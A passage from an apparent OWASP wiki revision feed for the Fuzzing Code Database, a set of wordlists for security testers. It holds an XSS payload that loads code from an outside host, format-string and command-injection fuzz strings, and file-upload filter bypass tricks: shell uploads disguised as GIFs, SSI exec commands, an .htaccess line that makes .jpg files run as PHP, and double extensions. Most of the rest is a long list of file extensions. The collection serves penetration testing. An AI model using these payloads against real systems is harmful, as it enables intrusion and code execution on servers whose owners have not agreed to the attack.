&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80070</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80070"/>
				<updated>2010-03-17T20:47:48Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
